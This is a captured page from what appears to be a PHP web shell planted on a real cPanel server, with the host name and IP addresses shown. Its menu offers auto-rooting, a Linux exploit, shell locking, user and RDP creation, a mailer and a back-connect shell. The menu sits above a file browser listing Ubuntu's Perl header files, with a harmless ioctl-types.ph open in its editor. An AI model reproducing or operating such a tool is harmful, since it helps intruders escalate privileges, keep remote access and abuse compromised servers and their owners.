Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.123
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl /
5.34.0 /
bits /
[ HOME SHELL ]
Name
Size
Permission
Action
linux
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
atomic_wide_counter.ph
207
B
-rw-r--r--
byteswap.ph
1.6
KB
-rw-r--r--
confname.ph
24.45
KB
-rw-r--r--
endian.ph
1.01
KB
-rw-r--r--
endianness.ph
385
B
-rw-r--r--
environments.ph
2.05
KB
-rw-r--r--
floatn-common.ph
11.71
KB
-rw-r--r--
floatn.ph
2.7
KB
-rw-r--r--
getopt_core.ph
168
B
-rw-r--r--
getopt_posix.ph
582
B
-rw-r--r--
ioctl-types.ph
1.72
KB
-rw-r--r--
ioctls.ph
3.74
KB
-rw-r--r--
long-double.ph
169
B
-rw-r--r--
posix_opt.ph
5.34
KB
-rw-r--r--
pthreadtypes-arch.ph
2.22
KB
-rw-r--r--
pthreadtypes.ph
492
B
-rw-r--r--
select.ph
889
B
-rw-r--r--
select2.ph
490
B
-rw-r--r--
sigaction.ph
1.68
KB
-rw-r--r--
sigcontext.ph
889
B
-rw-r--r--
sigevent-consts.ph
620
B
-rw-r--r--
siginfo-arch.ph
465
B
-rw-r--r--
siginfo-consts-arch.ph
207
B
-rw-r--r--
siginfo-consts.ph
4.3
KB
-rw-r--r--
signal_ext.ph
200
B
-rw-r--r--
signum-arch.ph
1.68
KB
-rw-r--r--
signum-generic.ph
1.6
KB
-rw-r--r--
sigstack.ph
441
B
-rw-r--r--
sigstksz.ph
568
B
-rw-r--r--
sigthread.ph
385
B
-rw-r--r--
sockaddr.ph
507
B
-rw-r--r--
socket-constants.ph
3.62
KB
-rw-r--r--
socket.ph
11.7
KB
-rw-r--r--
socket2.ph
177
B
-rw-r--r--
socket_type.ph
766
B
-rw-r--r--
ss_flags.ph
443
B
-rw-r--r--
stdint-intn.ph
212
B
-rw-r--r--
struct_mutex.ph
1019
B
-rw-r--r--
struct_rwlock.ph
943
B
-rw-r--r--
syscall.ph
75.59
KB
-rw-r--r--
syslog-ldbl.ph
355
B
-rw-r--r--
syslog-path.ph
363
B
-rw-r--r--
syslog.ph
404
B
-rw-r--r--
thread-shared-types.ph
427
B
-rw-r--r--
time64.ph
530
B
-rw-r--r--
timesize.ph
290
B
-rw-r--r--
types.ph
2.78
KB
-rw-r--r--
typesizes.ph
4.61
KB
-rw-r--r--
uintn-identity.ph
631
B
-rw-r--r--
unistd.ph
680
B
-rw-r--r--
unistd_ext.ph
597
B
-rw-r--r--
waitflags.ph
816
B
-rw-r--r--
waitstatus.ph
1.54
KB
-rw-r--r--
wordsize.ph
743
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ioctl-types.ph
require '_h2ph_pre.ph'; no warnings qw(redefine misc); unless(defined(&_SYS_IOCTL_H)) { die("Never use <bits/ioctl-types.h> directly; include <sys/ioctl.h> instead."); } require 'asm/ioctls.ph'; eval 'sub NCC () {8;}' unless defined(&NCC); eval 'sub TIOCM_LE () {0x1;}' unless defined(&TIOCM_LE); eval 'sub TIOCM_DTR () {0x2;}' unless defined(&TIOCM_DTR); eval 'sub TIOCM_RTS () {0x4;}' unless defined(&TIOCM_RTS); eval 'sub TIOCM_ST () {0x8;}' unless defined(&TIOCM_ST); eval 'sub TIOCM_SR () {0x10;}' unless defined(&TIOCM_SR); eval 'sub TIOCM_CTS () {0x20;}' unless defined(&TIOCM_CTS); eval 'sub TIOCM_CAR () {0x40;}' unless defined(&TIOCM_CAR); eval 'sub TIOCM_RNG () {0x80;}' unless defined(&TIOCM_RNG); eval 'sub TIOCM_DSR () {0x100;}' unless defined(&TIOCM_DSR); eval 'sub TIOCM_CD () { &TIOCM_CAR;}' unless defined(&TIOCM_CD); eval 'sub TIOCM_RI () { &TIOCM_RNG;}' unless defined(&TIOCM_RI); eval 'sub N_TTY () {0;}' unless defined(&N_TTY); eval 'sub N_SLIP () {1;}' unless defined(&N_SLIP); eval 'sub N_MOUSE () {2;}' unless defined(&N_MOUSE); eval 'sub N_PPP () {3;}' unless defined(&N_PPP); eval 'sub N_STRIP () {4;}' unless defined(&N_STRIP); eval 'sub N_AX25 () {5;}' unless defined(&N_AX25); eval 'sub N_X25 () {6;}' unless defined(&N_X25); eval 'sub N_6PACK () {7;}' unless defined(&N_6PACK); eval 'sub N_MASC () {8;}' unless defined(&N_MASC); eval 'sub N_R3964 () {9;}' unless defined(&N_R3964); eval 'sub N_PROFIBUS_FDL () {10;}' unless defined(&N_PROFIBUS_FDL); eval 'sub N_IRDA () {11;}' unless defined(&N_IRDA); eval 'sub N_SMSBLOCK () {12;}' unless defined(&N_SMSBLOCK); eval 'sub N_HDLC () {13;}' unless defined(&N_HDLC); eval 'sub N_SYNC_PPP () {14;}' unless defined(&N_SYNC_PPP); eval 'sub N_HCI () {15;}' unless defined(&N_HCI); 1;
Close